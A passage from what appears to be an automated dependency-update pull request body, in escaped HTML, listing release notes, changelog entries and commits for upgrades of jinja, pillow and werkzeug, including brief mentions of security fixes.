href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.6...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pillow` from 1.7.7 to 10.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/releases\"\u003epillow's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\"\u003ehttps://pillow.readthedocs.io/en/stable/releasenotes/10.3.0.html\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eDeprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate eval(), replacing it with lambda_eval() and unsafe_eval() \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDeprecate ImageCms constants and versions() function \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7702\"\u003e#7702\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanges\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-28219: Use strncpy to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003efunctools.lru_cache\u003c/code\u003e for \u003ccode\u003ehopper()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7912\"\u003e#7912\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImprove speed of loading QOI images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7925\"\u003e#7925\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdd --report argument to \u003cstrong\u003emain\u003c/strong\u003e.py to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded RGB to I;16, I;16L and I;16B conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e [\u003ca href=\"https://github.com/nulano\"\u003e\u003ccode\u003e@​nulano\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e [\u003ca href=\"https://github.com/Yay295\"\u003e\u003ccode\u003e@​Yay295\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eDetermine MPO size from markers, not EXIF data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e [\u003ca href=\"https://github.com/scaramallion\"\u003e\u003ccode\u003e@​scaramallion\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed joined corners for ImageDraw rounded_rectangle() non-integer dimensions \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7881\"\u003e#7881\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemoved Python and NumPy pinning on Cygwin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7880\"\u003e#7880\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUpdate UnidentifiedImageError and \u003cstrong\u003eversion\u003c/strong\u003e imports \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7644\"\u003e#7644\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eStop reading EPS image at EOF marker \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7753\"\u003e#7753\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePSD layer co-ordinates may be negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7706\"\u003e#7706\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse subprocess with CREATE_NO_WINDOW flag in ImageShow WindowsViewer \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7791\"\u003e#7791\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eWhen saving GIF frame that restores to background color, do not fill identical pixels \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7788\"\u003e#7788\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed reading PNG iCCP compression method \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7823\"\u003e#7823\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAllow writing IFDRational to UNDEFINED tag \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7840\"\u003e#7840\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix logged tag name when loading Exif data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7842\"\u003e#7842\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse maximum frame size in IHDR chunk when saving APNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7821\"\u003e#7821\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePrevent opening P TGA images without a palette \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7797\"\u003e#7797\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse palette when loading ICO images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7798\"\u003e#7798\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse consistent arguments for load_read and load_seek \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7713\"\u003e#7713\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eTurn off nullability warnings for macOS SDK \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7827\"\u003e#7827\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix shift-sign issue in Convert.c \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7838\"\u003e#7838\u003c/a\u003e [\u003ca href=\"https://github.com/r-barnes\"\u003e\u003ccode\u003e@​r-barnes\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ewinbuild: Refactor dependency versions into constants \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7843\"\u003e#7843\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eBuild macOS arm64 wheels natively \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7852\"\u003e#7852\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed typo \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7855\"\u003e#7855\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eOpen 16-bit grayscale PNGs as I;16 \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7849\"\u003e#7849\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eHandle truncated chunks at the end of PNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7709\"\u003e#7709\u003c/a\u003e [\u003ca href=\"https://github.com/lajiyuan\"\u003e\u003ccode\u003e@​lajiyuan\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eMatch mask size to pasted image size in GifImagePlugin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7779\"\u003e#7779\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/blob/main/CHANGES.rst\"\u003epillow's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0 (2024-04-01)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eCVE-2024-28219: Use \u003ccode\u003estrncpy\u003c/code\u003e to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e\n[radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDeprecate \u003ccode\u003eeval()\u003c/code\u003e, replacing it with \u003ccode\u003elambda_eval()\u003c/code\u003e and \u003ccode\u003eunsafe_eval()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e\n[radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise \u003ccode\u003eValueError\u003c/code\u003e if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003e--report\u003c/code\u003e argument to \u003ccode\u003e__main__.py\u003c/code\u003e to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e\n[nulano, radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded RGB to I;16, I;16L, I;16B and I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e\n[nulano, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e\n[Yay295, hugovk, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDetermine MPO size from markers, not EXIF data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e\n[scaramallion, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/5c89d88eee199ba53f64581ea39b6a1bc52feb1a\"\u003e\u003ccode\u003e5c89d88\u003c/code\u003e\u003c/a\u003e 10.3.0 version bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/63cbfcfdea2d163ec93bae8d283fcfe4b73b5dc7\"\u003e\u003ccode\u003e63cbfcf\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/2776126aa9af322b416eaca247f4f8ebefd08128\"\u003e\u003ccode\u003e2776126\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e from python-pillow/lcms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/aeb51cbb169eb3285818ba1390ddf2771d897e6e\"\u003e\u003ccode\u003eaeb51cb\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into lcms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/5beb0b66648db8b542bb5260eed79b25e33d643b\"\u003e\u003ccode\u003e5beb0b6\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/cac6ffa7b399ea79b6239984d1307056a0b19af2\"\u003e\u003ccode\u003ecac6ffa\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e from python-pillow/imagemath\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/f5eeeacf7539eaa0d93a677d7666bc7c142c8d1c\"\u003e\u003ccode\u003ef5eeeac\u003c/code\u003e\u003c/a\u003e Name as 'options' in lambda_eval and unsafe_eval, but '_dict' in deprecated eval\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/facf3af93dabcbdd8cdbda8c3b50eefafa3bb04c\"\u003e\u003ccode\u003efacf3af\u003c/code\u003e\u003c/a\u003e Added release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/2a93aba5cfcf6e241ab4f9392c13e3b74032c061\"\u003e\u003ccode\u003e2a93aba\u003c/code\u003e\u003c/a\u003e Use strncpy to avoid buffer overflow\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/a670597bc30e9d489656fc9d807170b8f3d7ca57\"\u003e\u003ccode\u003ea670597\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-pillow/Pillow/compare/1.7.7...10.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `werkzeug` from 0.8.3 to 3.0.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/werkzeug/releases\"\u003ewerkzeug's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.0.6\u003c/h2\u003e\n\u003cp\u003eThis is the Werkzeug 3.0.6 security fix release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Werkzeug/3.0.6/\"\u003ehttps://pypi.org/project/Werkzeug/3.0.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://werkzeug.palletsprojects.com/en/stable/changes/#version-3-0-6\"\u003ehttps://werkzeug.palletsprojects.com/en/stable/changes/#version-3-0-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix how \u003ccode\u003emax_form_memory_size\u003c/code\u003e is applied when parsing large non-file fields. \u003ca href=\"https://github.com/advisories/GHSA-q34m-jh98-gwm2\"\u003eGHSA-q34m-jh98-gwm2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003esafe_join\u003c/code\u003e catches certain paths on Windows that were not caught by \u003ccode\u003entpath.isabs\u003c/code\u003e on Python \u0026lt; 3.11. \u003ca href=\"https://github.com/advisories/GHSA-f9vj-2wh5-fj8j\"\u003eGHSA-f9vj-2wh5-fj8j\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.5\u003c/h2\u003e\n\u003cp\u003eThis is the Werkzeug 3.0.5 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Werkzeug/3.0.5/\"\u003ehttps://pypi.org/project/Werkzeug/3.0.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://werkzeug.palletsprojects.com/en/stable/changes/#version-3-0-5\"\u003ehttps://werkzeug.palletsprojects.com/en/stable/changes/#version-3-0-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/werkzeug/milestone/37?closed=1\"\u003ehttps://github.com/pallets/werkzeug/milestone/37?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe Watchdog reloader ignores file closed no write events. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2945\"\u003e#2945\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLogging works with client addresses containing an IPv6 scope. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2952\"\u003e#2952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore invalid authorization parameters. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2955\"\u003e#2955\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove type annotation fore \u003ccode\u003eSharedDataMiddleware\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2958\"\u003e#2958\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCompatibility with Python 3.13 when generating debugger pin and the current UID does not have an associated name. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2957\"\u003e#2957\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.4\u003c/h2\u003e\n\u003cp\u003eThis is the Werkzeug 3.0.4 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Werkzeug/3.0.4/\"\u003ehttps://pypi.org/project/Werkzeug/3.0.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-4\"\u003ehttps://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-4\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/werkzeug/milestone/36?closed=1\"\u003ehttps://github.com/pallets/werkzeug/milestone/36?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRestore behavior where parsing \u003ccode\u003emultipart/x-www-form-urlencoded\u003c/code\u003e data with\ninvalid UTF-8 bytes in the body results in no form data parsed rather than a\n413 error. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2930\"\u003e#2930\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove \u003ccode\u003eparse_options_header\u003c/code\u003e performance when parsing unterminated\nquoted string values. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2904\"\u003e#2904\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDebugger pin auth is synchronized across threads/processes when tracking\nfailed entries. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2916\"\u003e#2916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDev server handles unexpected \u003ccode\u003eSSLEOFError\u003c/code\u003e due to issue in Python \u0026lt; 